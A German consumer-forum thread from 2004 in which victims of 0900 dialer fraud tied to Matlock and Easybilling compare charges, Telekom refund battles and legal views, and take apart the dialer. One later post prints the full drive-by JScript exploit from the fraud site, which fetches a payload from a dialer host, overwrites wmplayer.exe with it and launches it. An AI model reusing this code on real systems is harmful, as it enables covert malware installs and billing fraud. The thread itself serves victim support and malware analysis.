090090000263 oder auch Matlock - ermitteln Sie (Teil 1)

[KalleM]

Re: Dialer aus RegTP-DB verschwunden?

Unter den Nummer 090090000426 und 090090000425 sind momentan nur noch je 2 Dialer registriert. Die Dialer vom 4.2. sind verschwunden.
Und dies gilt anscheinend auch für die anderen Matlock-Nummern!
Hoffentlich ist das kein temporäres Datenbankproblem, sondern der erste Schritt ...

Ich habe heute morgen auch beobachtet, dass alle Einträge aus der Datenbank verschwunden waren. Dies war aber offensichtlich ein Datenbankproblem, da sie nun wieder aufgelistet werden.

Ausgabe der Suche in der RegTP-Datenbank:
Rufnummer 90090000263
Keine Datensätze die ihren Suchkriterien entsprechen gefunden.
Überprüfen Sie Bitte Ihre Eingabe

 

[Alex]

Die zuständigen Mitarbeiter der RegTP wissen das - dies ist auch ein Grund dafür, warum ich bei der Matlock-Sache so eine feste Position einnehme.

Da frage ich mich nur, warum das dann trotzdem so lange dauert. Die Aufgabe der RegTP ist doch gerade sowas zu verhindern- und wenn ich in meinem Job bei auftretenden Problemen, die in der selben Geschwindigkeit lösen würde- wäre ich den schon längst los.

Jeden Tag gibt es neue Opfer - dank Google Spamming und Co. - nicht jeder hat die Lust und den Mut sich mit der Telekom rumzustreiten, und nicht zu vergessen bei aller Euphorie "ich geh zu meinem Anwalt", auch die Anwälte wollen Geld- nicht alle haben Rechtsschutzversicherung, die das deckt und selbst wenn das Dialer-Geld von der Telekom storniert wird- die Anwaltskosten zurückbekommen wird schwieriger....

Tja liebe Gesetzgebung und RegTP - das gibt nur eine 5 in Verbraucherschutz - setzen ......

Alex
PS:nicht das es missverstanden wird- das ist kein Vorwurf an Anna und die anderen die sich der Problematik angenommen haben und sich drum kümmmern !!! - die verdienen eher ein Danke das Opfer doch noch Unterstützung ohne finanzielle Interessen (denk ich mal ) bekommen

 

[Ernst-Helmut]

Re: Dialerbetrug durch Easybilling & Matlock

Hi Petrus,

bin mir nicht sicher, ob Du mich unten schon mitgezählt hast, jedenfalls bin ich ein 30 € - Geschädigter von Ende Januar unter der "Dienstanbieter" -Nr. 090090000423 (1 Ebene höher als unser Peter Huth)
('0')

Übrigens habe ich gerade diese € 30 von der Telekom mir wieder gutschreiben lassen, Telekom braucht jetzt von mir nur noch meine Einwendung mit den genauen Angaben in post-schriftlicher Form...

Schöne Grüße an Euch anderen mindestens 65 Opfers
Ernst-Helmut

Schwarzliste der von Easybilling & Matlock Geschädigten
Daten aus forum.computerbetrug und anderen Quellen, siehe Fußnoten
Beim Autor Petrus kann demnächst eine komplette Liste angefordert werden

Stand vom 09.03.04 23:00


Matlock besitzt noch 40 weitere Dialernummern kontinuierlich bis
090090000470

Summe der Geschädigten - 65

 

[blumenwiese23]

telekom

erstmal danke anna für die pn. weiteres über pn.

@altenpfleger, wenn du meinst, man schreibt mal kurz ein kleines briefchen an die telekom und bittet sie höflichst darum, nur den unstrittigen betrag abzubuchen, dann liegst du falsch. ich habe drei briefe geschickt, beim dritten war dann endlich ruhe. erst nach dem dritten konnte mir die hotline auskunft über meine postenverteilung geben.

@all will die telekom eigentlich das verfahren beschleunigen?? bekam am 5. märz ein antwortschreiben, mit einer frist. ich solle doch bis 12. märz mein buchungskonto ausgleichen. dann ist die telekom aber so nett und schickt mir am 9. märz schon eine kleine eselsbrücke in form von einer mahnung. dort wird verlangt umgehend mein buchungskonto auszugleichen.

gruss

 

[blumenwiese23]

Re: Dialerbetrug durch Easybilling & Matlock

Übrigens habe ich gerade diese € 30 von der Telekom mir wieder gutschreiben lassen, Telekom braucht jetzt von mir nur noch meine Einwendung mit den genauen Angaben in post-schriftlicher Form...

jetzt frag ich mich, gibt es bei der telekom kulanz via gesichtskontrolle?? :evil:
oder wird gewürfelt?? "...so der praktikant soll jetzt mal auswürfeln..."
vielleicht gelost...
.
.
.
man kann es nicht sagen.

 

[Petrus]

090090000263 Matlock Easybilling DTAG und andere Artisten

Hi Ernst-Helmut,

ja, ich habe Dich mitgezählt, Deine Erstmeldung war am Do, 22.01.2004, leider noch ohne Nummernangabe.
Ich werde bei der nächsten Veröffentlichung die richtige Nummern-Zuordnung vornehmen.

Ich bin über dieselbe Nummer (090090000423) abgezockt worden, aber gleich viermal.
Wir bleiben am Ball bzw. am Big-Bill !!

Ich habe mich entschlossen, mich von Dirk Schmelz interviewen zu lassen.
Je mehr Geschädigte dazu bereit sind, umso größer wird der Druck auf alle: DTAG, Easybilling, Matlock, ermittelnde Polizei und Staatsanwaltschaft, Regierung und verbesserte Gesetzgebung.

Zitat: "Weil Du aber weder kalt noch heiß bist, sondern lau, will ich Dich ausspeien aus meinem Munde."
Im Klartext, es gibt zu viele passive Opfer !!

Himmliche Grüße
Petrus
who is watching everything in the hell

 

[Ernst-Helmut]

Re: Dialerbetrug durch Easybilling & Matlock

Huhu Blumenwiese,
die Rückerstattung habe ich bisher ausschließlich durch meine Sparkasse durchführen lassen, betreffs Telekom bin ich auf deren Reaktion gespannt wie ein Flitzebogen
Ernst-Helmut

Übrigens habe ich gerade diese € 30 von der Telekom mir wieder gutschreiben lassen, Telekom braucht jetzt von mir nur noch meine Einwendung mit den genauen Angaben in post-schriftlicher Form...

jetzt frag ich mich, gibt es bei der telekom kulanz via gesichtskontrolle?? :evil:
oder wird gewürfelt?? "...so der praktikant soll jetzt mal auswürfeln..."
vielleicht gelost...
.
.
.
man kann es nicht sagen.

 

[blumenwiese23]

Re: Dialerbetrug durch Easybilling & Matlock

Huhu Blumenwiese,
die Rückerstattung habe ich bisher ausschließlich durch meine Sparkasse durchführen lassen, betreffs Telekom bin ich auf deren Reaktion gespannt wie ein Flitzebogen
Ernst-Helmut

Übrigens habe ich gerade diese € 30 von der Telekom mir wieder gutschreiben lassen, Telekom braucht jetzt von mir nur noch meine Einwendung mit den genauen Angaben in post-schriftlicher Form...

jetzt frag ich mich, gibt es bei der telekom kulanz via gesichtskontrolle?? :evil:
oder wird gewürfelt?? "...so der praktikant soll jetzt mal auswürfeln..."
vielleicht gelost...
.
.
.
man kann es nicht sagen.

entschuldigung, wollte ja eh nicht dich anprangern. sondern die dtag.
pass auf, sie buchen es erneut ab.


gruss

 

[TSCoreNinja]

@Alle Matlock Geschaedigten:

habe gestern abend aus Langeweile Peter Huths Surftipps fuer die Maximierung der Telefonrechung befolgt, und meine weitgehend ungenutzten Windowspartition zum Abschuss freigegeben Das Ganze mit fester Internetanbindung und installiertem 0900 Warner, sowie SnagIt zum Festhalten des Panoramas als AVI.

Interessante Beobachtungen:

-Nach dem Ausflug waren meine Temporary Internet Files weg. Sehr schade, haette gerne die verwendeten JavaScripts analysiert. Aber etwas habe ich dank Hinweise von Betroffenen trotzdem gefunden, siehe weiter unten.

-Peter Huths URL loest eine Einwahl bei 090090000422 aus, die laut RegTP Datenbank Eintrag auf Matlock zugelassen ist, mit 3 Dialern

Reg.-Nr.: 90090000422-734801 vom : Dec 9 2003 10:20AM
Hash - Wert :d88598d769b6c6f59b39f4b730c8f8ae

Reg.-Nr.: 90090000422-755973 vom : Dec 17 2003 1:33PM
Hash - Wert :9f6c7d8e726dc772961609aefceac39d

Reg.-Nr.: 90090000422-12638Hash - Wert AE3BECAFA4BE4906AE1733DAA301AEB0B2122B1136

-Mein Dialer behauptet, er sei der letzterer vom Hashwert. Ist er aber nicht. Genauer gesagt gibt es nicht nur einen, sondern zwei Dialer, ein kostenloses Extra, der Benutzer sollte dies schaetzen, sonst erhaelt man im Preis der Einwahl ja immer nur einen. Erst eine Datei access.exe, die eine gepackte Datensektion hat, aus der die zweite erstellt wird, und mit Kommandozeilenparametern aufgerufen wird, dann eine Datei mit zufaellig erzeugtem Namen. Beide haben andere Hashwerte.

-die Kommandozeilenparameter zum Starten der zweiten exe Datei sind gemaess Blick in meine Kristalkugel zweifach vorhanden, welche verwendet werden, weiss ich nicht sicher.
1. Satz
-cid=DE
-ph=0E0000003BEDB750CEF0B678C360CE3734492DB2
-usr=XXXXXXXXXXX (wg evt sensitiver Daten weggekuerzt)
-nospk=true
-url=http://........-/galleries/
2. Satz
-cid=DE
-ph=0E0000003BEDB750CEF0B678C360CE3734492DB2
-usr=XXXXXXXXXXX (wg evt sensitiver Daten weggekuerzt)
-web=yes
-nospk=true
-url=http://.....xxx-/galleries/

Allerdings schaltet der Zusatz -web=yes die Einwahlaufforderung ab beim Aufruf der zweiten Datei per Hand :evil: :devil2:

-Interessant an meinem Video ist, dass der Dialer sich nicht ohne Aufforderung einwaehlt. Nur erfolgt die Eingabe auf der Webseite (JavaScript)! Dann meldet sich auf einmal der 0900 Warner, danach bekomme ich die access.exe zum Download angeboten. Wieso dass, fragt sich der Laie. Zugegebnermassen hatte ich vorher dem Download von access.exe bereits einmal zugestimmt, trotzdem kann es nicht mit rechten Dingen zugehen, wenn automatisch eine Datei auf meinem Rechner ausgefuehrt wird.

-habe (nicht von dieser Einwahl, aber identischer URL) zwei Dateien, die einen bekannten Remote Exploit des Internet Explorers ausnutzen. Leider funktioniert der Dialerdownload nicht, da evt ein Cookie oder so etwas auf meinem Rechner fehlte (?!). Bin fuer Tipps offen, wie man das umgehen kann. Dateien des Exploits sind angehaengt. AVI des Einwahlvorgangs bzw exe Dateien ggf auf Anfrage.

Gruesse,
TSCoreNinja

URLs gelöscht tf)Moderator

 

[TSCoreNinja]

@mods, bitte URLs entfernen, habe sie ubersehen, und kann irgendwie das Posting nicht editieren. Sorry

 

[technofreak]

@mods, bitte URLs entfernen, habe sie ubersehen, und kann irgendwie das Posting nicht editieren. Sorry

Auf Grund des Mißbrauchs der Möglichkeit Postings nachträglich zu löschen bzw, zu verfälschen
wurde diese Möglichkeit ab sofort auch für angemeldete User deaktiviert.
(Dies gilt nicht für dich, aber diese Feature können nur für alle aktiviert, bzw deaktiviert werden )

Gruß
tf

 

[Petrus]

090090000263 et al.

Hallo Fans,

Zum besseren Verständnis, was in unserer Republik abläuft, ein paar unfrisierte Gedanken von mir:


Einzel-Verbindungs-Nachweis (= EVN), Datenschutz und die Perversion, die die DTAG daraus gemacht hat.


EVN damals:
Früher konnte der Telefon-Kunde sich nur aktiv mittels Wählscheibe oder Tastatur ins Telefon-Festnetz einwählen. Er hätte sich selbst jederzeit einen lückenlosen, vollständigen EVN anfertigen können, ganz einfach indem er jedes Gespräch mit Uhrzeit, Zielnummer, angewählten Fernsprechteilnehmer usw. protokolliert hätte. Inzwischen gibt es sinnreiche elektronische Vorrichtungen, die ihm diese Arbeit abnehmen könnten: Impulszähler, Gebührenzähler usw.

EVN heute:
Aber der Telefon-Kunde bekam von der Deutschen Bundespost oder deren Nachfolgeorganisation, der Deutschen Telekom AG ( = DTAG) die kostenlose !!! Möglichkeit angeboten, dass die DTAG diesen EVN für ihren Kunden erstellt und jeder Monatsrechnung beifügt. Leider haben damals nur sehr wenige Kunden von diesem Angebot Gebrauch gemacht.

Datenschutz:
Es ist selbstverständlich, dass die EVN-Daten aller DTAG-Kunden vertraulich behandelt werden müssen, auch ohne Datenschutzgesetz, aber vergleichbar dem Bankgeheimnis.
Die EVN-Daten des Kunden A gehen weder die übrigen Kunden , noch die Mitarbeiter der DTAG etwas an, es handelt sich schließlich um Privatsphäre. Ich gehe davon aus, dass auch die Ermittlungsbehörden ohne richterliche Vollmacht keinen Zugang zu den Daten des EVN haben (dürften).

Zeitalter der Dialer
Soweit schön und gut. Jetzt kommt das Zeitalter der Dialer, und vorbei ist es mit der Kontrolle des DTAG-Kunden über sein Telefon-konto, seine Telefon-Monatsrechnung, zumindest bei den inzwischen unterprivilegierten DTAG-Kunden, die noch keinen EVN beantragt haben.

Ich weiß nicht, welche Rechtsauffassung die DTAG vertritt, ich weiß nicht einmal, ob sie überhaupt eine vertritt, wenn ich folgendes erfahre.
Ein DTAG-Kunde hat eine überhöhte Rechnung und begehrt von der DTAG Auskunft, welche Firma oder welcher Diensteanbieter mit welcher Zielnummer ihn auf der Telefonrechnung belastet hat (bzw. ihm von der DTAG belastet wurde). Die DTAG verweigerte bis zum 01. Februar 2004 die Auskunft mit Hinweis auf den Datenschutz.

Ich denk, mich küsst eine Giraffe.
Wessen Daten muß die DTAG da denn schützen, es sind doch meine eigenen Daten, die Verbindungen, die ich von meinem Rufnummernkonto (oder Konten) selbst getätigt habe oder deren Betätigung durch Dritte mittels eines Dialers ich wissentlich und voll informiert zugestimmt habe (oder etwa doch nicht zugestimmt habe?). Die Erfassung der EVN ist eine vertrauliche und persönliche Dienstleistung, die von einigen Kunden, die schon früher als andere vorsichtig und misstrauisch waren, an die DTAG delegiert wurde.
An dieser Stelle möchte ich auch den Finger in die Wunde dieser Ungleichbehandlung legen: Kunden mit EVN und solche ohne, die im Schadensfall dann auch wesentlich schlechter gestellt sind. Ist das verfassungskonform ???

Herrschaftswissen der DTAG:
Weiß die DTAG mehr als ich ? Ja sicher, die DTAG sieht ja auf den bei ihr im Hause erstellten EVN’s aller Kunden, dass der ein oder andere ihrer „Auftraggeber“, sprich „Mehrwertdienste-Anbieter“ mit seinem (inzwischen natürlich bei der RegTP registrierten) Dialer die ein oder andere Einwahl auf dem Rufnummernkonto des Auskunft begehrenden Kunden veranlasst hat. Ja und hier setzt jetzt die „Datenschutzphilosophie“ der DTAG ein. Der Auftraggeber, auch „Mehrwertdienste-Anbieter“ genannt, ja der muß doch auch Datenschutz geniessen !! Dessen Intimsphäre muß doch vor dem DTAG-Kunden geschützt werden, ist doch ganz klar, oder ? Und nur im Dunkeln ist gut munkeln !!

Fiktives Beispiel aus dem Bankwesen:
Damit es noch klarer wird, will ich ein fiktives Beispiel aus dem Bankwesen bringen:
Der Kunde A hat auf seinem Girokonto Einzahlungen, Auszahlungen und Überweisungen veranlasst, dafür bekommt er von seiner Bank Kontoauszüge. Normal !!
Eines Tages erhält er ein Schreiben seiner Bank, dass der Datenschutzbeauftragte der Bank eine Innen-Revision durchgeführt hat und zu der Feststellung gekommen ist, dass die Kontoauszüge etwas verändert werden müssen: sie werden nur noch einmal monatlich verschickt und enthalten nur noch die Summe aller Zahlungseingänge und aller Zahlungsausgänge. Warum ?? Weil es ja inzwischen das allseits beliebte Lastschriftverfahren gibt, und weil die Daten der lastschreibenden Firmen schutzbedürftig sind. Kapiert ? kapiert !! es war ja – wie erwähnt – nur ein fiktives Beispiel, welches die groteske (perverse) Logik der DTAG verdeutlichen soll. Es ist aber kein Zufall, dass es zwischen dem Lastschriftverfahren und dem Verhalten viel zu vieler Dialer so große Parallelen gibt.


Logische Konsequenz:
Die DTAG hat in der Vergangenheit dem EVN-Auskunft-ersuchenden Kunden den Einblick in sein eigenes Rufnummernkonto so heftig und nachhaltig verwehrt hat, dass es erst eines Gesetzes bedurfte, um die DTAG zur Auskunft zu zwingen. Diese Auskunft hätte die DTAG schon vorher ebenso selbstverständlich gewähren müssen, wie die Bank detaillierte Kontoauszüge erstellt und dem Kunden zur Verfügung stellt. Also muß die DTAG ein starkes Motiv haben, wenn sie ganz anders (nach Gutsherrenart) verfährt. Der Datenschutz ist nur ein Vorwand, der Schutz der Auftraggeber oder „Mehrwertdienste-Anbieter“ bzw. das mit diesen Firmen abgewickelte lukrative Geschäft ist der einzige und wahre Grund.

Juristische Konsequenz:
Durch die Vorenthaltung von berechtigten Informationen, auf die der DTAG Endkunde Anspruch hat, durch diese Vorenthaltung hat die DTAG Beihilfe zum Betrug und Strafvereitelung begangen und damit gegen den berühmten Paragraphen 261 StGB (Geldwäsche) verstoßen.
Der 09009-Dialer, der auf meinem Rechner viermal nacheinander im Abstand von 6 bis 13 Sekunden dieselbe Zielnummer 0000423 angewählt hat, verursacht durch wiederholte, unbeabsichtigte (spontane) Einwahl Kosten und ist damit betrügerisch. Folglich ist die Bereitstellung des Dialers im Sinne der Paragrafen 263 und 263a des Strafgesetzbuchs (StGB) strafbar. Damit wiederum liegt eine Vortat gemäß Paragraf 261 StGB vor ("Geldwäsche"). Die Telekom unterstützt durch ihre Auskunftsverweigerung Betrüger nicht nur dabei, ihre Beute zu sichern (Beihilfe zum Betrug), sondern sie schützt sie auch vor Strafverfolgung (Strafvereitelung).

Mit himmlichen Grüßen

Petrus

 

[Anonymous]

Tach zusammen !

Ich kämpfe seit kurzem gegen unsere gemeinsamen Freunde !
Petrus hat mich bewogen, in die Öffentlichkeit zu gehen.

Der Ärger begann am 02.01.04 mit 090090000264. Den Stecker
konnte ich leider erst mit 4 Sekunden Verspätung ziehen.

Den Dialer konnte ich isolieren :
(Web.exe Version 2.0.0.4 mit dem Hashwert : 6AF1E01A7D6B5E892ED6D90B5562EF0CD26A895C
ermittelt mit HashAnzeige der RegTP).

Da haben sich unsere Freunde wohl einen kleinen Lapsus erlaubt, denn
der Hashwert gehört zur Version 3.0.0.4 vom Feb.04.

Die RegTP wurde informiert.

Somit sollte die Registrierung der Dialer Versionen 2.0.0.4 und auch
3.0.0.4 mangels Eindeutigkeit in Frage gestellt sein.

Desweiteren kann ich die Idee, dass der eigentliche Zugriff über eine
Manipulation des Media Players V9 erfolgte, nur unterstützen.
Ich fand ebenfalls eine Datei wmplayer.exe.bak, allerdings mit einer
Grösse von 340KB, anstatt 73KB.

Die ersten 73KB der Dateien sind identisch. Dann folgt bisher nicht
identifizierter Code ??. Am Ende sind allerdings Rückstände
des wmplayer V7 (Fileinfo) zu finden.

Schauen wir mal, was noch kommt.

Tchuess

 

[günni14]

Leider die Anmeldung verloren. Der Router schaltet nach 60s ab.
Das letzte Posting war von Günni14.

Nu aber,
Tchuess

 

[Opfer]

LOL ICH BIN SO SCHEISSE ! Sorry, aber das musste raus. Ich bin echt doof wie Brot ! Ich habe den bei mir eingesetzten Dialer die ganze Zeit auffer Pladde und bin nicht clever genug das zu merken. Aber besser spät als nie An die Freaks...ratet wie er heisst...nein...nicht Web.exe...sondern...Tadaaa: wmplayer.exe Richtig bei mir wurde das Exploit ausgenutzt, und ich hab da schon tausendmal nachgeguckt und jetzt gerade is mir erst aufgefallen, das der Dialer gar kein Icon hat Ein kurzer Blick hinein: UPX - alles klar Datum passt auch Jetzt wird erstmal kräftig analysiert. Ich habe bereits eine weitere Demo, die das ganze Reproduziert, aber die is noch net ganz fertig. Auf jeden Fall is das noch cleverer als die Sache mit den Scripts die die Exe dann auf dem Rechner zusammenbasteln. Zur verständigung hier die Ultrakurzversion wie das ganze Funktioniert:

Per Javascript wird der Dialer von einer Seite geladen und als wmplayer.exe im Windows Media Player verzeichniss gespeichrt.
Dann wird ein Link aufgerufen der eine Videodatei abspielen soll. Logischerweisse wird dazu dann eben dieser wmplayer.exe gestartet und Tata - der Dialer aktiviert sich ^^

Ich versteh echt nicht warum mir das die ganze Zeit über nicht aufgefallen ist...hmm...manchmal sieht man den Wald vor lauter Bäumen nicht

Gruss
Opfer

 

[juanito]

Hallo,

Den Dialer konnte ich isolieren :
(Web.exe Version 2.0.0.4 mit dem Hashwert : 6AF1E01A7D6B5E892ED6D90B5562EF0CD26A895C
ermittelt mit HashAnzeige der RegTP).

Da haben sich unsere Freunde wohl einen kleinen Lapsus erlaubt, denn
der Hashwert gehört zur Version 3.0.0.4 vom Feb.04.

alle Dialer die ich bisher downgeloaded haben, haben Hashwerte die am 4. Februar registriert wurden und alle diese Dialer zeigen eine Versionsnr. die zu einer früheren Registrierung gehört.

Ich vermute, daß nur die Dialer die am 4. Februar registriert wurden eingesetzt werden... auch schon vor dem 4. Februar...

Blöd nur, wenn die Dialer die vor dem 4. Febraur registriert wurden, ein anderes Verhalten zeigen würden...

Desweiteren kann ich die Idee, dass der eigentliche Zugriff über eine
Manipulation des Media Players V9 erfolgte, nur unterstützen.
Ich fand ebenfalls eine Datei wmplayer.exe.bak, allerdings mit einer
Grösse von 340KB, anstatt 73KB.

Die ersten 73KB der Dateien sind identisch. Dann folgt bisher nicht
identifizierter Code ??. Am Ende sind allerdings Rückstände
des wmplayer V7 (Fileinfo) zu finden.

Das ist aber in der Tat interessant. Meine wmplayer.exe.bak war identisch mit der Original wmplayer.exe

Gruß

 

[Opfer]

Edit: In der Exe sind mehrere Exes drinne Das gibt jetzt ein bissel friemel Arbeit, aber das tolle ist ja, das man immer schön die Einsprungpunkte sieht. Ich werde jetzt mal schauen, wie viele Programme sich wirklich in dem Teil befinden und dann schaun wir mal, was da genau vor sich geht.
Also, diejenigen die Betroffen sind. Schaut mal, ob ihr im Verzeichniss:
C:\Programme\Windows Media Player eine Datei mit dem Namen wmplayer.exe habt die kein Icon hat habt. Die Grösse der Datei geträgt 60kb (61.440 Bytes). Wenn ja, dann packt die am besten mal in ein Archiv (z.B. mit Winzip oder Winrar) und löscht die exe auf der Platte - in jedem Fall aber vorher sichern !

Gruss
Opfer

 

[TSCoreNinja]

JScript Exploit

For the record, nachdem die Attachments aus dem letzten Posting verschwundern sind, und ich es nicht mehr aendern kann, hier der JScript Code:

<SCRIPT LANGUAGE="JScript.Encode">function preparecode(code) 
{
    result = '';
    lines = code.split(/\r\n/);
    for (i=0;i<lines.length;i++) 
    {
        line = lines[i];
        line = line.replace(/^\s+/,"");
        line = line.replace(/\s+$/,"");
        line = line.replace(/'/g,"\\'");
        line = line.replace(/[\\]/g,"\\\\");
        line = line.replace(/[/]/g,"%2f");
        line = line.replace(/[?]/g,"%3f");
        line = line.replace(/[&]/g,"%26");
        line = line.replace(/[=]/g,"%3d");
        if (line != '') 
	{
            result += line +'\\r\\n';
        }
    }
    return result;
}
function doit() 
{
    str="document.write (\"<script language=\\\"JScript.Encode\\\" SRC=
\\\"http://$DIALERURL/loader/get.php?id=2&sess_id=$SESSIONID\\\\\"><\/script>\");";
    mycode = preparecode(str);
    myURL = "file:javascript:eval('" + mycode + "')";
    window.open(myURL,"_media")
}
window.open("403.php","_media");
setTimeout("doit()", 500);

</SCRIPT>

Script 1

var ldr = new ActiveXObject("Microsoft.XMLHTTP");
var origMP = new ActiveXObject("Microsoft.XMLHTTP");
ldr.Open("GET", "http://$DIALERURL/loader/get.php?id=3&sess_id=$SESSIONID\\",0);
ldr.Send();

var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
var g_Restored=0;
function FSave(path)
{
    s.Write(ldr.responseBody);
    lpath = "file://"+path.replace(/[\\]/g,"/")+"wmplayer.exe";
    origMP.Open("GET", lpath,0);
    origMP.Send();
    s.SaveToFile(path+"wmplayer.exe",2);
    s.Write(origMP.responseBody);
    s.SaveToFile(path+"wmplayer.exe.bak",2);    
}
function FRestore(path)
{
    var sv = new ActiveXObject("ADODB.Stream");
    sv.Mode = 3;
    sv.Type = 1;
    sv.Open();
    var tMP = new ActiveXObject("Microsoft.XMLHTTP");
    lpath = "file://"+path.replace(/[\\]/g,"/")+"wmplayer.exe.bak";
    tMP.Open("GET", lpath,0);
    tMP.Send();
    sv.Write(tMP.responseBody);
    sv.SaveToFile(path+"wmplayer.exe",2); 
    g_Restored=1;
}
try{
    FSave("C:\\Program Files\\Windows Media Player\\");
}catch (e){};
try{
    FSave("D:\\Program Files\\Windows Media Player\\");
}catch (e){};
try{
    FSave("C:\\Programme\\Windows Media Player\\");
}catch (e){};
try{
    FSave("D:\\Programme\\Windows Media Player\\");
}catch (e){};


location.href = "mms://";
function Restore() {
    if (g_Restored==1)
    {
	return;
    }
try {
    try{
        FRestore("C:\\Program Files\\Windows Media Player\\");
    } catch (e) {};
    try{
        FRestore("D:\\Program Files\\Windows Media Player\\");
    } catch (e) {};
    try{
        FRestore("C:\\Programme\\Windows Media Player\\");
    } catch (e) {};
    try{
        FRestore("D:\\Programme\\Windows Media Player\\");
    } catch (e) {};
} catch (e) { alert (e.description);};
}
setTimeout("Restore()",500);
setTimeout("Restore()",1000);
setTimeout("Restore()",2000);
setTimeout("Restore()",3000);
setTimeout("Restore()",4000);
setTimeout("Restore()",5000);
setTimeout("Restore()",6000);
setTimeout("Restore()",7000);
setTimeout("Restore()",8000);
setTimeout("Restore()",9000);
setTimeout("Restore()",10000);

Ziemlich identisch zu dem auf Heise verwendeten Code.
Gruesse,
TSCoreNinja

 

[Opfer]

So, nochmal ich. Also: Bei mir bestand die wmplayer.exe insgesammt aus 4 verschiedenen exes. Block 1 war crap mit Dialerfragmenten (evtl zur Übergabe der Parameter). Block 2 war der eigentliche Dialer selber (Wow...der hat ja sogar ein Icon ). Block 3+4 war wieder crap. Das interesante ist, das Block 1,3 und 4 mit UPX 1.24 gepackt waren, während Block 2 die neue Beta 1.90 benutzt hat. Wie üblich ist alles schön eingestellt. Also -web=true -nospk=true usw.
Ich denke, die Luft für Eggebeck und Matlock wird langsam seeeeeehr dünn...

Gruss
Opfer

 

[juanito]

Hi,

Per Javascript wird der Dialer von einer Seite geladen und als wmplayer.exe im Windows Media Player verzeichniss gespeichrt.
Dann wird ein Link aufgerufen der eine Videodatei abspielen soll. Logischerweisse wird dazu dann eben dieser wmplayer.exe gestartet und Tata - der Dialer aktiviert sich ^^

ich habe am Tag meiner Einwahl später einen Packet capture mit meinem Firewall gemacht (ich habe das Log noch nicht analysiert) aber in dem Log taucht eindeutig "web.exe" auf. Wenn alles in der wmplayer.exe drinnen ist, wäre das gar nicht nötig
Dies hieße aber auch der Dialer kommt auf unterschiedliche Arten auf den Rechner...

Kannst Du mir Deine wmplaye.exe zuschicken?

Gruß